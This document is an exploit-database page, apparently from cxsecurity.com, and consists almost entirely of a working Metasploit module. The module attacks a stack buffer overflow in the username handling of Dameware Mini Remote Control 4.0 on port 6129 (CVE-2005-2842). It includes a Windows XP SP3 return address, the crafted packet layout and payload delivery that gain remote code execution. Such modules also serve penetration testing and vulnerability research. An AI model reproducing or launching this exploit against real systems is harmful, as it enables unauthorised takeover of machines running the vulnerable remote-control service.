Dameware Mini Remote Control 4.0 Username Stack Buffer Overflow

2017.09.15
Credit: james fitts
Risk: High
Local: Yes
Remote: Yes
CVE: N/A
CWE: CWE-119

require 'msf/core' class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp def initialize(info = {}) super(update_info(info, 'Name' => 'Dameware Mini Remote Control Username Stack Buffer Overflow', 'Description' => %q{ This module exploits a stack based buffer overflow vulnerability found in Dameware Mini Remote Control v4.0. The overflow is caused when sending an overly long username to the DWRCS executable listening on port 6129. The username is read into a strcpy() function causing an overwrite of the return pointer leading to arbitrary code execution. }, 'Author' => [ 'James Fitts' ], 'License' => MSF_LICENSE, 'Version' => '$Revision: $', 'References' => [ [ 'CVE', '2005-2842' ], [ 'BID', '14707' ], [ 'URL', 'http://secunia.com/advisories/16655' ], [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2005-08/1074.html' ] ], 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Privileged' => true, 'Payload' => { 'Space' => 140, 'BadChars' => "\x00\x0a\x0d", 'StackAdjustment' => -3500, 'PrependEncoder' => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff", 'Compat' => { 'SymbolLookup' => '+ws2ord', }, }, 'Platform' => 'win', 'Targets' => [ [ 'Windows XP SP3 EN', { # msvcrt.dll # push esp/ retn 'Ret' => 0x77c35459, } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Sept 01 2005')) register_options( [ Opt::RPORT(6129), ], self.class ) end def pkt1 p = payload.encoded boom = "\x43" * 259 boom[100, 4] = [target.ret].pack('V') boom[108, p.length] = p packet = "\x00" * 4056 packet[0, 4] = "\x30\x11\x00\x00" packet[4, 4] = "\x00\x00\x00\x00" packet[8, 4] = "\xd7\xa3\x70\x3d" packet[12, 4] = "\x0a\xd7\x0d\x40" packet[16, 20] = "\x00" * 20 packet[36, 4] = "\x01\x00\x00\x00" packet[40, 4] = [0x00002710].pack('V') packet[196, 259] = rand_text_alpha(259) packet[456, 259] = boom packet[716, 259] = rand_text_alpha(259) packet[976, 259] = rand_text_alpha(259) packet[1236, 259] = rand_text_alpha(259) packet[1496, 259] = rand_text_alpha(259) return packet end def pkt2 packet = "\x00" * 4096 packet[756, 259] = rand_text_alpha(259) return packet end def exploit connect sock.put(pkt1) sock.recv(1024) sock.put(pkt2) sock.recv(84) handler disconnect end end __END__


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top